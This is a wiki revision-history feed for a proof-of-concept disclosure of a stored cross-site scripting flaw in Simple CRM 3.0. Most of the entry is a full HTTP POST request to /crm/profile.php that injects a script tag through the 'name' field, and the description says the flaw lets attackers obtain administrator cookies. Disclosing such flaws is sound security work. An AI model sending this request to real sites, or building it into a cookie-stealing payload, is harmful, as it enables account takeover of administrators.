https://pwnwiki.com/index.php?action=history&feed=atom&title=Simple_CRM_3.0_XSS%E6%BC%8F%E6%B4%9E
Simple CRM 3.0 XSS漏洞 - Revision history
2026-04-14T23:16:39Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Simple_CRM_3.0_XSS%E6%BC%8F%E6%B4%9E&diff=5502&oldid=prev
Pwnwiki: Created page with "<pre> # Exploit Title: Simple CRM 3.0 - 'name' Stored Cross site scripting (XSS) # Date: 20/06/2021 # Exploit Author: Riadh Benlamine (rbn0x00) # Vendor Homepage: https://phpg..."
2021-06-21T13:53:06Z
<p>Created page with "<pre> # Exploit Title: Simple CRM 3.0 - 'name' Stored Cross site scripting (XSS) # Date: 20/06/2021 # Exploit Author: Riadh Benlamine (rbn0x00) # Vendor Homepage: https://phpg..."</p>
<p><b>New page</b></p><div><pre><br />
# Exploit Title: Simple CRM 3.0 - 'name' Stored Cross site scripting (XSS)<br />
# Date: 20/06/2021<br />
# Exploit Author: Riadh Benlamine (rbn0x00)<br />
# Vendor Homepage: https://phpgurukul.com/<br />
# Software Link: https://phpgurukul.com/small-crm-php/<br />
# Version: 3.0<br />
# Category: Webapps<br />
# Tested on: Apache2+MariaDB latest version<br />
# Description : Simple CRM suffers from Cross-site scripting, allowing authenticated attackers to obtain administrator cookies.<br />
<br />
Vunlerable page: /crm/profile.php<br />
<br />
POC:<br />
----<br />
POST /crm/profile.php HTTP/1.1<br />
Host: localhost<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />
Accept-Language: en-US,en;q=0.5<br />
Accept-Encoding: gzip, deflate<br />
Content-Type: multipart/form-data;<br />
boundary=---------------------------386571683933745493952831205283<br />
Content-Length: 779<br />
Origin: http://localhost<br />
Connection: close<br />
Referer: http://localhost/crm/profile.php<br />
Cookie: PHPSESSID=l0iqlrmehhcasinv0ip09e3ls1<br />
Upgrade-Insecure-Requests: 1<br />
<br />
-----------------------------386571683933745493952831205283<br />
Content-Disposition: form-data; name="name"<br />
<script>alert('xss')</script><br />
-----------------------------386571683933745493952831205283<br />
<br />
Content-Disposition: form-data; name="alt_email"<br />
<br />
-----------------------------386571683933745493952831205283<br />
<br />
Content-Disposition: form-data; name="phone"<br />
0123456789<br />
<br />
-----------------------------386571683933745493952831205283<br />
<br />
Content-Disposition: form-data; name="gender"<br />
m<br />
<br />
-----------------------------386571683933745493952831205283<br />
<br />
Content-Disposition: form-data; name="address"<br />
<br />
-----------------------------386571683933745493952831205283<br />
<br />
Content-Disposition: form-data; name="update"<br />
Update<br />
<br />
-----------------------------386571683933745493952831205283--<br />
</pre></div>
Pwnwiki